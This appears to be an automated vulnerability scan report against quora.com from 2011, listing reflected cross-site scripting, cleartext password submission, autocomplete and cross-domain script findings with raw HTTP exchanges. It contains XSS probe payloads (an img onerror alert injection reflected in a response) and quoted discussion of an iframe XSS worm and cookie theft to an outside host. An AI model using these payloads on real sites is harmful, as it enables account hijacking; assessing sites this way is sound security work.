1. Cross-site scripting (reflected)
1.1. http://www.quora.com/XSS [q parameter]
1.2. http://www.quora.com/ajax/full_navigator_results [___W2_parentId parameter]
1.3. http://www.quora.com/ajax/full_navigator_results [q parameter]
1.4. http://www.quora.com/up/tchannel3/updates [callback parameter]
2. Cleartext submission of password
3. Password field with autocomplete enabled
4. Cross-domain Referer leakage
5. Cross-domain script include
5.2. http://www.quora.com/%22http://d1vgw4v7ja2ido.cloudfront.net/-78c17c872cca0888.png/%22
5.3. http://www.quora.com/%5C%22http://d1vgw4v7ja2ido.cloudfront.net/-78c17c872cca0888.png%5C%22
5.6. http://www.quora.com/about
5.7. http://www.quora.com/challenges
5.8. http://www.quora.com/t-15171
Severity: | High |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /XSS |
GET /XSS?q=xss+111+222+3345002</ScRiPt%20><img Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:04:18 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 410244 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... layout:Header:5q ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /ajax/full_navigator |
GET /ajax/full_navigator Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive x-requested-with: XMLHttpRequest Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:03:07 GMT Pragma: no-cache Cache-Control: no-cache content-type: application/json; charset=utf-8 Content-Length: 5448 {"html": "<div class=\"results_frame\" id=\"__w2_CxYxb2T_results ...[SNIP]... </div>", "css": "", "js": "W2.addComponentMetadata( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /ajax/full_navigator |
GET /ajax/full_navigator Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive x-requested-with: XMLHttpRequest Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:02:51 GMT Pragma: no-cache Cache-Control: no-cache content-type: application/json; charset=utf-8 Content-Length: 7650 {"html": "<div class=\"results_frame\" id=\"__w2_hXP97Wb_results ...[SNIP]... </span>\", \"type\": \"addquestionitem\", \"id\": null}], \"actionType\": \"url\", \"numMatches\": 8, \"query\": \"x8abf9<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /up/tchannel3/updates |
GET /up/tchannel3/updates?min Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com/ Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Content-Length: 110 Etag: "76ffe57ffdeba8e5306 Content-Type: text/javascript; charset=UTF-8 Server: TornadoServer/1.2.1 jsonp133024eae9bfb59 |
Severity: | High |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | / |
GET / HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:00:38 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 19452 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... <div class="w3_5 p1"><form class="row w2_5 col inline_login_form" method="POST" id="__w2_xyvPhd9_login ...[SNIP]... </label><input class="text" group="__w2_xyvPhd9 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | / |
GET / HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:00:38 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 19452 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... <div class="col w4 signup_form"><form class="w3" action="/signup/signup ...[SNIP]... </label><input class="text" group="__w2_uMdqnEs ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | / |
GET / HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:00:38 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 19452 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... <div class="col w4 signup_form"><form class="w3" action="/signup/signup ...[SNIP]... </label><input class="text" group="__w2_uMdqnEs ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | / |
GET / HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:00:38 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 19452 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... <div class="w3_5 p1"><form class="row w2_5 col inline_login_form" method="POST" id="__w2_xyvPhd9_login ...[SNIP]... </label><input class="text" group="__w2_xyvPhd9 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /XSS |
GET /XSS?q=xss+111+222+33 HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:02:12 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 404539 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... <a href="/XSS"><img class="profile_photo_img" src="http://d1vgw4v7 ...[SNIP]... <br />[1] <a href="https://www.owasp ...[SNIP]... <br />[3] <a href="https://www.owasp ...[SNIP]... <a href="/John-Kinsella" routing="q://user/(720369 ...[SNIP]... </div>Allowing IFRAMEs can let an attacker turn a reflected XSS vulnerability into a persistent one, which can make it much more wormable. (See <a href="http://en.wikipedia ...[SNIP]... <div id="ld_bYUvYp_321" ...[SNIP]... <a href="/Daniel-Miller-7" routing="q://user/ ...[SNIP]... <a href="/David-Bloom-2" routing="q://user/(339614 ...[SNIP]... </div>Let's say that <a href="http://foo.com" rel="nofollow" target="_blank" class="external_link">foo.com</a> ...[SNIP]... <br />1. Attacker inserts iframe into own profile, pointing to <a href="http://www.foo.com ...[SNIP]... </a> src="<a href="http://attacker.com ...[SNIP]... <br />2. Visitor opens attacker's profile. The iframe runs the reflected XSS attack on <a href="http://foo.com" rel="nofollow" target="_blank" class="external_link">foo.com</a>.<br />3. The attacker's script, now running in the <a href="http://foo.com" rel="nofollow" target="_blank" class="external_link">foo.com</a> origin, adds the iframe to the visitor's <a href="http://foo.com" rel="nofollow" target="_blank" class="external_link">foo.com</a> ...[SNIP]... <a href="/Mathias-Karlsson" routing="q://user/(167251 ...[SNIP]... <a href="/Rob-Smith-16" routing="q://user/ ...[SNIP]... </div>Take <a href="https://grepular ...[SNIP]... <br /><a href="http://code.google ...[SNIP]... <br /><a href="http://diveintomark ...[SNIP]... 9;t filter user input properly, whether in a form field, a URL parameter, poor use of header information, and several others. I have an in depth article on what it is, how to detect it and prevent it: <a href="https://www ...[SNIP]... <br /><a href="http://www ...[SNIP]... <a href="/Justin-Cormack" routing="q://user/(429212 ...[SNIP]... <a href="/Justin-Cormack" routing="q://user/(429212 ...[SNIP]... <br />So it's very simple, it just collects cookies and sends them to some script running at "<a href="http://typpo.us" rel="nofollow" target="_blank" class="external_link">typpo.us</a> ...[SNIP]... <a href="/Zachary-Miller" routing="q://user/ ...[SNIP]... <a href="/Marcel-Laverdet" routing="q://user/(493)"><img class="profile_photo_img comment_image" src="http://d1vgw4v7 ...[SNIP]... <a href="/Marcel-Laverdet" routing="q://user/(493)"><img class="profile_photo_img" src="http://d1vgw4v7 ...[SNIP]... <a href="/Simon-Willison" routing="q://user/(47509) ...[SNIP]... <a href="/Daniel-Miller-7" routing="q://user/ ...[SNIP]... <a href="/Manuel-Lemos" routing="q://user/ ...[SNIP]... <a href="/Mike-Fratto" routing="q://user/(411370 ...[SNIP]... <a href="/David-Molnar" routing="q://user/(1300)" ...[SNIP]... <a href="/Shu-Uesugi" routing="q://user/(5498)" ...[SNIP]... <a href="/Charles-Iliya ...[SNIP]... <a href="/Myroslav-Opyr" routing="q://user/(16639) ...[SNIP]... <a href="/William-Chan-1" routing="q://user/(26302) ...[SNIP]... <a href="/Petr-Nachtmann" routing="q://user/(26978) ...[SNIP]... <a href="/Sho-Tabata" routing="q://user/(29392) ...[SNIP]... <a href="/Joseph-Quattrocchi ...[SNIP]... <a href="/Scott-Ballantyne" routing="q://user/(34309) ...[SNIP]... <a href="/Forest-Zhu" routing="q://user/(39427) ...[SNIP]... <a href="/Keso-Me" routing="q://user/(42371) ...[SNIP]... <a href="/ChaoJiao-Yang" routing="q://user/(43487) ...[SNIP]... <a href="/Spark-Zhang" routing="q://user/(43792) ...[SNIP]... <a href="/Rio-Jiang" routing="q://user/(43820) ...[SNIP]... <a href="/Ian-MacLeod" routing="q://user/(43913) ...[SNIP]... <a href="/Eddie-Wolfie" routing="q://user/(44145) ...[SNIP]... <a href="/Liu-You" routing="q://user/(44702) ...[SNIP]... <a href="/Ross-Di" routing="q://user/(44811) ...[SNIP]... <a href="/Leo-Wang-1" routing="q://user/(45677) ...[SNIP]... <a href="/Benjamin-Bai" routing="q://user/(45889) ...[SNIP]... <a href="/Binhao-Shang" routing="q://user/(46548) ...[SNIP]... <a href="/Guillaume-Theoret" routing="q://user/(46799) ...[SNIP]... <a href="/Simon-Willison" routing="q://user/(47509) ...[SNIP]... <a href="/Jyrki-Pulliainen" routing="q://user/(47527) ...[SNIP]... <a href="/Yuji-Takabatake" routing="q://user/(50627) ...[SNIP]... <a href="/Tiago-Pregueiro" routing="q://user/(82180) ...[SNIP]... <a href="/Doug-Winter-1" routing="q://user/(125005 ...[SNIP]... <a href="/Teddy-Zetterlund" routing="q://user/(142266 ...[SNIP]... <a href="/Tinus-Guichelaar" routing="q://user/(148210 ...[SNIP]... <a href="/Vickrum-Loi" routing="q://user/(148365 ...[SNIP]... <a href="/Mathias-Karlsson" routing="q://user/(167251 ...[SNIP]... <a href="/Jianfeng-Lu" routing="q://user/(260780 ...[SNIP]... <a href="/Yoz-Grahame" routing="q://user/(267402 ...[SNIP]... <a href="/Danny-Glix" routing="q://user/(280473 ...[SNIP]... <a href="/Konrad-Markus" routing="q://user/(332965 ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | / |
GET / HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:00:38 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 19452 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /%22http://d1vgw4v7ja2ido |
GET /%22http://d1vgw4v7ja2ido Host: www.quora.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://www.quora.com/XSS Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:09:39 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 16268 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /%5C%22http://d1vgw4 |
GET /%5C%22http://d1vgw4 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com/XSS Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:06:00 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 16133 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /What-are-the-best |
GET /What-are-the-best Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com/XSS Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:02:24 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 102814 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /XSS |
GET /XSS?q=xss+111+222+33 HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:02:12 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 404539 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /about |
GET /about HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com/ Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:00:53 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 17916 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /challenges |
GET /challenges HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:01:50 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 18063 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /t-15171 |
GET /t-15171 HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com/XSS Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:05:31 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 460410 <!DOCTYPE html><html><head><title>/ - Quora</title><script> this.require||function(a ...[SNIP]... </script> <script src="http://d1zlmuws ...[SNIP]... </div><script type='text/javascript' src='http://d1zlmuws ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.quora.com |
Path: | /challenges |
GET /challenges HTTP/1.1 Host: www.quora.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.quora.com Cookie: m-b=j564Qu5GUoDxPWJ7 |
HTTP/1.1 200 OK Server: PasteWSGIServer/0.5 Python/2.7.2 Date: Fri, 14 Oct 2011 12:01:50 GMT Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Length: 18063 <!DOCTYPE html><html><head><title this.require||function(a ...[SNIP]... <a href="mailto:jobs@quora.com">jobs@quora.com</a> ...[SNIP]... <a href="mailto:jobs@quora.com">jobs@quora.com</a> ...[SNIP]... |